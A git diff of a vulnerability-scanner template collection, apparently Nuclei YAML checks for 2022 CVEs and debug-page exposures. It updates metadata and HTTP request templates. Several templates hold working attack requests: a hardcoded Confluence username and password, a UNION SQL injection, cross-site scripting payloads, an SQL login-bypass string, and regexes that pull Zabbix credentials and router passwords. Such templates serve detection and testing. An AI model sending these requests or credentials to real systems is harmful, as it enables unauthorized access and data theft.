b/poc/cve/cve-2022-22947.yaml index c02886515d..6b10f6f359 100644 --- a/poc/cve/cve-2022-22947.yaml +++ b/poc/cve/cve-2022-22947.yaml @@ -4,16 +4,19 @@ info: name: Spring Cloud Gateway Code Injection author: pdteam severity: critical - description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host." + description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - https://github.com/wdahlenburg/spring-gateway-demo - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - https://tanzu.vmware.com/security/cve-2022-22947 - tags: cve,cve2022,apache,spring,vmware,actuator,oast classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cve-id: CVE-2022-22947 + cwe-id: CWE-94 + tags: cve,cve2022,apache,spring,vmware,actuator,oast requests: - raw: diff --git a/poc/cve/cve-2022-23131.yaml b/poc/cve/cve-2022-23131.yaml index 0e182ea627..0f93ea7161 100644 --- a/poc/cve/cve-2022-23131.yaml +++ b/poc/cve/cve-2022-23131.yaml @@ -4,22 +4,19 @@ info: name: Zabbix - SAML SSO Authentication Bypass author: For3stCo1d severity: critical - description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. reference: - - https://support.zabbix.com/browse/ZBX-20350 - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - https://github.com/1mxml/CVE-2022-23131 - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. + metadata: + shodan-query: http.favicon.hash:892542951 + fofa-query: app="ZABBIX-监控系统" && body="saml" classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.8 cve-id: CVE-2022-23131 - cwe-id: CWE-290 - metadata: - fofa-query: app="ZABBIX-监控系统" && body="saml" - shodan-query: http.favicon.hash:892542951 - tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev + tags: cve,cve2022,zabbix,auth-bypass,saml,sso requests: - method: GET @@ -40,5 +37,3 @@ requests: - type: dsl dsl: - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" - -# Enhanced by mp on 2022/03/08 diff --git a/poc/cve/cve-2022-24288.yaml b/poc/cve/cve-2022-24288.yaml index 859598f067..d5a45b194d 100644 --- a/poc/cve/cve-2022-24288.yaml +++ b/poc/cve/cve-2022-24288.yaml @@ -3,18 +3,20 @@ id: CVE-2022-24288 info: name: Apache Airflow OS Command Injection author: xeldax - severity: critical + severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. reference: - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 + - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 metadata: - shodan-query: title:"Airflow - DAGs" + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + verified: true tags: cve,cve2022,airflow,rce requests: diff --git a/poc/cve/cve-2022-26138.yaml b/poc/cve/cve-2022-26138.yaml new file mode 100644 index 0000000000..10f5282faf --- /dev/null +++ b/poc/cve/cve-2022-26138.yaml @@ -0,0 +1,53 @@ +id: CVE-2022-26138 + +info: + name: Atlassian Questions For Confluence - Hardcoded Credentials + author: HTTPVoid + severity: critical + description: | + Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance. + remediation: | + Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. + reference: + - https://twitter.com/fluepke/status/1549892089181257729 + - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html + - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 + - https://jira.atlassian.com/browse/CONFSERVER-79483 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26138 + cwe-id: CWE-798 + epss-score: 0.97262 + epss-percentile: 0.99834 + cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: questions_for_confluence + shodan-query: http.component:"Atlassian Confluence" + tags: cve2022,cve,confluence,atlassian,default-login,kev + +http: + - raw: + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action + + payloads: + os_username: + - disabledsystemuser + os_password: + - disabled1system1user6708 + attack: pitchfork + matchers: + - type: dsl + dsl: + - 'location == "/httpvoid.action"' +# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-26148.yaml b/poc/cve/cve-2022-26148.yaml index edf32a34c5..315b0b25a8 100644 --- a/poc/cve/cve-2022-26148.yaml +++ b/poc/cve/cve-2022-26148.yaml @@ -1,13 +1,15 @@ id: CVE-2022-26148 info: - name: Grafana Zabbix Integration - Credential Disclosure + name: Grafana & Zabbix Integration - Credential Disclosure author: Geekby severity: critical - description: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -15,7 +17,7 @@ info: metadata: fofa-query: app="Grafana" shodan-query: title:"Grafana" - tags: cve,cve2022,grafana,zabbix + tags: cve,cve2022,grafana,zabbix,exposure requests: - method: GET @@ -49,4 +51,6 @@ requests: regex: - '"password":"(.*?)"' - '"username":"(.*?)"' - - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' \ No newline at end of file + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' + +# Enhanced by mp on 2022/05/19 diff --git a/poc/cve/cve-2022-28080.yaml b/poc/cve/cve-2022-28080.yaml index b04f58c7db..9076309976 100644 --- a/poc/cve/cve-2022-28080.yaml +++ b/poc/cve/cve-2022-28080.yaml @@ -6,18 +6,31 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. + remediation: | + To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated,cms,royalevent + cwe-id: CWE-89 + epss-score: 0.01461 + epss-percentile: 0.86424 + cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: event_management_system_project + product: event_management_system + tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project -requests: +http: - raw: - | POST /royal_event/ HTTP/1.1 @@ -38,7 +51,6 @@ requests: ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} @@ -58,7 +70,6 @@ requests: 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -68,5 +79,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 +# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-29301.yaml b/poc/cve/cve-2022-29301.yaml index 007fc44e22..9841826381 100644 --- a/poc/cve/cve-2022-29301.yaml +++ b/poc/cve/cve-2022-29301.yaml @@ -1,22 +1,29 @@ id: CVE-2022-29301 info: - name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) + name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting author: For3stCo1d severity: high description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. reference: - https://www.exploit-db.com/exploits/50968 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cve-id: CVE-2022-29301 metadata: verified: true + max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview + tags: cve,cve2022,xss,solarview,edb -requests: +http: - method: GET path: - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green' @@ -38,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 06/21/2022 +# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-29548.yaml b/poc/cve/cve-2022-29548.yaml new file mode 100644 index 0000000000..5cdf4a3d75 --- /dev/null +++ b/poc/cve/cve-2022-29548.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-29548 + +info: + name: WSO2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. + remediation: | + Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ + - https://github.com/vishnusomank/GoXploitDB + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + epss-score: 0.00299 + epss-percentile: 0.68867 + cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wso2 + product: api_manager + google-query: inurl:"carbon/admin/login" + tags: cve,cve2022,wso2,xss,packetstorm + +http: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-30073.yaml b/poc/cve/cve-2022-30073.yaml index 9b6d4abc54..8e51358733 100644 --- a/poc/cve/cve-2022-30073.yaml +++ b/poc/cve/cve-2022-30073.yaml @@ -1,25 +1,36 @@ id: CVE-2022-30073 info: - name: WBCE CMS v1.5.2 XSS Stored + name: WBCE CMS 1.5.2 - Cross-Site Scripting author: arafatansari severity: medium description: | - WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters. + WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://github.com/APTX-4879/CVE - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073 - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2022-30073 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-30073 cwe-id: CWE-79 + epss-score: 0.00205 + epss-percentile: 0.57793 + cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,wbcecms,xss + verified: true + max-request: 4 + vendor: wbce + product: wbce_cms + tags: cve2022,cve,wbcecms,xss,wbce -requests: +http: - raw: - | POST /admin/login/index.php HTTP/1.1 @@ -27,32 +38,19 @@ requests: Content-Type: application/x-www-form-urlencoded url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login - - | GET /admin/users/index.php HTTP/1.1 Host: {{Hostname}} - - | POST /admin/users/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit= - - | GET /admin/users/index.php HTTP/1.1 Host: {{Hostname}} - extractors: - - type: regex - name: formtoken - part: body - group: 1 - regex: - - '' - internal: true - - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -70,3 +68,13 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + name: formtoken + group: 1 + regex: + - '' + internal: true + part: body +# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-32024.yaml b/poc/cve/cve-2022-32024.yaml index 7aea1ed902..316fc83d33 100644 --- a/poc/cve/cve-2022-32024.yaml +++ b/poc/cve/cve-2022-32024.yaml @@ -1,11 +1,15 @@ id: CVE-2022-32024 info: - name: Car Rental Management System v1.0 - SQL Injection + name: Car Rental Management System 1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. + Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 @@ -14,16 +18,21 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32024 cwe-id: CWE-89 + epss-score: 0.00834 + epss-percentile: 0.80157 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" -requests: +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -31,13 +40,12 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 Host: {{Hostname}} skip-variables-check: true - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -48,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-34047.yaml b/poc/cve/cve-2022-34047.yaml index 1f44408d44..954b71dae4 100644 --- a/poc/cve/cve-2022-34047.yaml +++ b/poc/cve/cve-2022-34047.yaml @@ -1,26 +1,38 @@ id: CVE-2022-34047 info: - name: Wavlink Set_safety.shtml - Password Exposure + name: WAVLINK WN530HG4 - Improper Access Control author: For3stCo1d severity: high description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. + WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-34047 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34047 cwe-id: CWE-668 + epss-score: 0.14292 + epss-percentile: 0.95577 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,wavlink,router,exposure + tags: cve,cve2022,wavlink,router,exposure,packetstorm -requests: +http: - raw: - | GET /set_safety.shtml?r=52300 HTTP/1.1 @@ -43,3 +55,4 @@ requests: - type: regex regex: - 'syspasswd="(.+?)"' +# digest: 4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-34049.yaml b/poc/cve/cve-2022-34049.yaml new file mode 100644 index 0000000000..c9d91f7d05 --- /dev/null +++ b/poc/cve/cve-2022-34049.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-34049 + +info: + name: WAVLINK WN530HG4 - Improper Access Control + author: For3stCo1d + severity: medium + description: | + Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. + reference: + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 + - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-34049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-34049 + cwe-id: CWE-552 + epss-score: 0.17111 + epss-percentile: 0.95601 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,wavlink,router,exposure + +http: + - raw: + - | + GET /cgi-bin/ExportLogs.sh HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login' + - 'Password' + condition: and + + - type: word + part: header + words: + - filename="sysLogs.txt" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-36883.yaml b/poc/cve/cve-2022-36883.yaml new file mode 100644 index 0000000000..4548af5cd1 --- /dev/null +++ b/poc/cve/cve-2022-36883.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-36883 + +info: + name: Jenkins Git <=4.11.3 - Missing Authorization + author: c-sh0 + severity: high + description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin. + remediation: | + Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability. + reference: + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + - http://www.openwall.com/lists/oss-security/2022/07/27/1 + - https://github.com/StarCrossPortal/scalpel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + epss-score: 0.01328 + epss-percentile: 0.84605 + cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* + metadata: + verified: true + max-request: 1 + vendor: jenkins + product: git + framework: jenkins + shodan-query: X-Jenkins + tags: cve,cve2022,jenkins,plugin,git,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "repository:" + - SCM API plugin + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100ac3853e5c0b1575adbb7b7ed2af7b72f43f114875211dd347e0293df556a12a602201f6215244b284d054336a4750c2340219ab9d9be367383ba0b171439c19ccd56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/gradio-CVE-2024-1183.yaml b/poc/cve/gradio-CVE-2024-1183.yaml index 06f1156ff3..ddaf958baa 100644 --- a/poc/cve/gradio-CVE-2024-1183.yaml +++ b/poc/cve/gradio-CVE-2024-1183.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.5 cve-id: CVE-2024-1183 cwe-id: CWE-601 - epss-score: 0.00061 - epss-percentile: 0.24702 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 @@ -33,4 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f8114233dc93d6f7f8756ef02b1f03954696a215009b10c4052a06421fe4250022100e565921ef3de19b35c2af7550b0d98f911333848805b11ad398ff151d6e4ce17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/debug/django-debug-exposure-7030.yaml b/poc/debug/django-debug-exposure-7030.yaml index 5a47ffdc6d..d2b8bf4545 100644 --- a/poc/debug/django-debug-exposure-7030.yaml +++ b/poc/debug/django-debug-exposure-7030.yaml @@ -3,8 +3,9 @@ id: django-debug-exposure info: name: Django Debug Exposure author: geeknik - reference: https://twitter.com/Alra3ees/status/1397660633928286208 severity: high + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 tags: django,exposure requests: diff --git a/poc/debug/jboss-seam-debug-page-8239.yaml b/poc/debug/jboss-seam-debug-page-8239.yaml index 9caff7dbc9..e9a9d56eec 100644 --- a/poc/debug/jboss-seam-debug-page-8239.yaml +++ b/poc/debug/jboss-seam-debug-page-8239.yaml @@ -3,7 +3,8 @@ info: name: Jboss Seam Debug Page Enabled author: dhiyaneshDK severity: medium - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml tags: jboss,logs,exposure requests: - method: GET diff --git a/poc/debug/laravel-debug-enabled-8576.yaml b/poc/debug/laravel-debug-enabled-8576.yaml index 7be14a40fd..c90c73af19 100644 --- a/poc/debug/laravel-debug-enabled-8576.yaml +++ b/poc/debug/laravel-debug-enabled-8576.yaml @@ -5,18 +5,15 @@ info: description: Laravel with APP_DEBUG set to true is prone to show verbose errors. severity: medium tags: debug,laravel,misconfig - requests: - method: GET path: - "{{BaseURL}}/_ignition/health-check" - matchers-condition: and matchers: - type: word words: - can_execute_commands - - type: status status: - 200 diff --git a/poc/debug/php-debug-bar-9506.yaml b/poc/debug/php-debug-bar-9506.yaml index ed89604e82..98fea9bec4 100644 --- a/poc/debug/php-debug-bar-9506.yaml +++ b/poc/debug/php-debug-bar-9506.yaml @@ -1,5 +1,4 @@ id: php-debug-bar - info: name: PHP Debug bar author: dhiyaneshDk diff 